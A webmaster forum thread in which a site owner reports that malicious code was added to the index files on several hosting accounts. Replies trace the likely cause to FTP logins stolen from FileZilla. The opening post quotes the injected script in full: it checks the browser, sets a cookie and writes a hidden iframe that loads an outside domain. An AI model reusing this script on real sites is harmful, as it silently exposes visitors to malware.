Got hacked... not sure how

[penguinbc]

So I have about 20 domains spread across a few host gator accounts and I have my own dedicated server at theplanet that has some websites on it. All have different logins. Every single index.html or index.php had this code added to the bottom of it at around 2am last night and the file permissions changed to 777.

</html><script> var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='v48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","v48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://karenbrowntx.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}</script>

I don't know wtf that is but it caused all my websites to stop responding.

The code was added to a couple dozen html/php files within like a couple minutes. My first thought and probably anyone elses is well if its across multiple accounts all with different passwords and on my dedicated as well then my local machine is compromised. I run latest windows updates with McAfee updated and firewalls on, it did not find anything. So I fully uninstall mcafee, purchased full Avast and ran that and it did not find anything either. So I purchase malware bytes and run that and it does not find anything either. I am pretty careful about everything, I am constantly looking at what processes are running in task manager, there is nothing there I don't recognize. I check msconfig to make sure nothing gets added there. I must be doing something wrong (Yeah you were running McAfee jackass).

The only thing that all of the accounts have in common is I have the logins saved in filezilla and that is the only way I am thinking it could have happened. Could there be like a java or web attack that could have executed rouge code on some website and just uploaded my filezilla logins to?

I checked root on the box it dosent seem like anyone else has logged in or run any commands and such, none of my gmail accounts show any suspicious logins on them. My debit/credit cards that I use daily for online purchases don't show any suspicious charges. Any idea what the hell happened?

 

[Hydrorank]

why do you have them set at 777 ?????????????

 

[penguinbc]

why do you have them set at 777 ?????????????

They weren't before. All files are 644, all of the files that got the code added to them were changed to 777 when I checked them.

 

[Hydrorank]

host provider has a good firewall? maybe the weak security

 

[Kiopa_Matt]

[EDIT: Actually, I'll PM you. That doesn't need to be public knowledge.]

 

[AllBizNiz]

I had a similar thing happen to me not too long ago. They injected all my domains and it was a bitch cleaning. I'm pretty sure they got the info through Filezille. Maybe they're stored as plain text. I just use remote desktop now on my VPS and if I'm doing anything with FTP I make sure to turn the FTP server off when I'm done.

 

[penguinbc]

host provider has a good firewall? maybe the weak security

It was spread across at least 4 separate servers, all with different logins. One of them is my private dedicated server only running a few domains. All index files had code added to the bottom of them within like a minute of each other.

 

[penguinbc]

I had a similar thing happen to me not too long ago. They injected all my domains and it was a bitch cleaning. I'm pretty sure they got the info through Filezille. Maybe they're stored as plain text. I just use remote desktop now on my VPS and if I'm doing anything with FTP I make sure to turn the FTP server off when I'm done.

This is the only thing that I can think of that I had all my logins stored in was in Filezilla on my local machine. This might just be it right here but I am not entirely sure yet, Mcafee, Avast, Malwarebytes all come back negative and I always have a firewall up so I don't know how it could have happened.

If that was what happened, well I guess that is my fault. I have like 20 logins all different all secure and hard to remember like D$!u8&uW, maybe I just need to actually write them all down and not save them on my machine anymore...

 

[magcshroom]

This is the only thing that I can think of that I had all my logins stored in was in Filezilla on my local machine. This might just be it right here but I am not entirely sure yet, Mcafee, Avast, Malwarebytes all come back negative and I always have a firewall up so I don't know how it could have happened.

What sort of software are you running on your server?

Do all the sites have the same sort of setup as in all wordpress, ecommerce software, etc?

If so, probably a vulnerability that got discovered and people just exploiting it.

If your sites are on different platforms and don't share any similar aspects then its something on your own computer.

I would just backup important shit and reformat. A lot of stuff is FUD and only way to really clean is a reformat IMO.

 

[Pulse]

I had a similar thing happen to me not too long ago. They injected all my domains and it was a bitch cleaning. I'm pretty sure they got the info through Filezille. Maybe they're stored as plain text. I just use remote desktop now on my VPS and if I'm doing anything with FTP I make sure to turn the FTP server off when I'm done.

Had the same thing happen to me.

The virus gets the FTP username/password from the FTP clients. It then downloads the index files, adds the code and re-uploads it. The code usually points to the same virus. So, anyone accessing this site gets infected with the same virus, and it uses the FTP username/password to spread again.

 

[penguinbc]

What sort of software are you running on your server?

Do all the sites have the same sort of setup as in all wordpress, ecommerce software, etc?

If so, probably a vulnerability that got discovered and people just exploiting it.

If your sites are on different platforms and don't share any similar aspects then its something on your own computer.

I would just backup important shit and reformat. A lot of stuff is FUD and only way to really clean is a reformat IMO.

Nothing that is common across them all... Unless you count Cpanel...

The fact that All accounts had code added to the bottom of index files within 1 minute of each other makes me think they just grabbed all the logins from filezilla, and ran some script that auto injects it to all index files once it logs in successfully but I am not sure.

If I told you what websites were compromised i'd probably get a lot of shit from people so all I can say is there is a lot of sensitive data going through one of them and I'm lucky that whoever did this did not realize it... hopefully.

Had the same thing happen to me.

The virus gets the FTP username/password from the FTP clients. It then downloads the index files, adds the code and re-uploads it. The code usually points to the same virus. So, anyone accessing this site gets infected with the same virus, and it uses the FTP username/password to spread again.

Yeah... This is probably what happened then... Explains why only the filezilla logins were compromised and not anything else like a trojan or keylogger might have done.

On another note is there a Secure FTP program that I can keep passwords in that I don't have to worry about this happening again?

 

[BigWill]

Keylogger on machine or packet sniffer on your network

 

[Big Joe]

I have had this happen recently to and what a bitch it is. You really need to quarantine that machine. Contact your host and see if they will remove the virus and change the PWs for you.

Luckily most of my sites are at certifiedhosting and they were really good about cleaning up all of my sites and setting me up with new passwords. Do not log back into these sites from this machine until you have reformatted it.

Its fucking scary to wake up an see that your traffic went to shit over night and you find your sites either blank or all virused the fuck up.


[edit] - P.S. - you might want to try nd reintall WP over all of the files. The virus is most noticable on the .index files but gets injected into the .js files too.

 

[penguinbc]

Keylogger on machine or packet sniffer on your network

One of the accounts that got hit is on a seperate host gator server that I have not even logged in or looked at in over a year. Its details were stored in Filezilla though... Machine must have been compromised or just the Filezilla FTP program was...

 

[TigerUK]

i had a virus that infected my pc and ftp'd into all my sites and changed them. i know because all the websites that had ftp on my computer were infected, the ones that didn't got away scot free.

 

[SirKonstantine]

My employer got hacked when I was there. After some recon, I found out it was cuz one of the guys got a virus on his home machine and the virus copied all of his FTP logins from Filezilla. Then, they put those logins for sale and some dudes from Eastern Europe purchased it and hacked our servers.

Maybe something like this as well?

My hackers left a mark and I ended up tracing it back to them. I just emailed those guys and asked how to make my network more secure. They were nice and just told me what they did.

 

[TigerUK]

My employer got hacked when I was there. After some recon, I found out it was cuz one of the guys got a virus on his home machine and the virus copied all of his FTP logins from Filezilla. Then, they put those logins for sale and some dudes from Eastern Europe purchased it and hacked our servers.

Maybe something like this as well?

My hackers left a mark and I ended up tracing it back to them. I just emailed those guys and asked how to make my network more secure. They were nice and just told me what they did.

yeah it's amazing how insecure filezilla is with login details. when you export your login details it stores the passwords in plain text .xml format. Doesnt even give you choice of encrypting.

I'm gonna take a guess and say that they are stored on you computer in a similarly unsecure way too.

 

[headiez247]

this thread is terrifying. I hope it never happens to me.

to op, were you able to get sites back online quickly after discovering the hack?

 

[stumpyb]

The only thing that all of the accounts have in common is I have the logins saved in filezilla and that is the only way I am thinking it could have happened. Could there be like a java or web attack that could have executed rouge code on some website and just uploaded my filezilla logins to?

you are likely correct, as filezilla stores that info in a plaintext xml file including password.

 

[penguinbc]

yeah it's amazing how insecure filezilla is with login details. when you export your login details it stores the passwords in plain text .xml format. Doesnt even give you choice of encrypting.

I'm gonna take a guess and say that they are stored on you computer in a similarly unsecure way too.

Is there a different FTP client I should be using? Does anyone know? I'd gladly throw some money at one that I don't have to worry about this happening to.

this thread is terrifying. I hope it never happens to me.

to op, were you able to get sites back online quickly after discovering the hack?

All they did was add some code to the end of the pages that was giving errors for anyone visiting. If this happened while I was away for a while I'd be screwed. I was paranoid about checking my stuff every few hours before but this pretty much makes me want to check it even more often.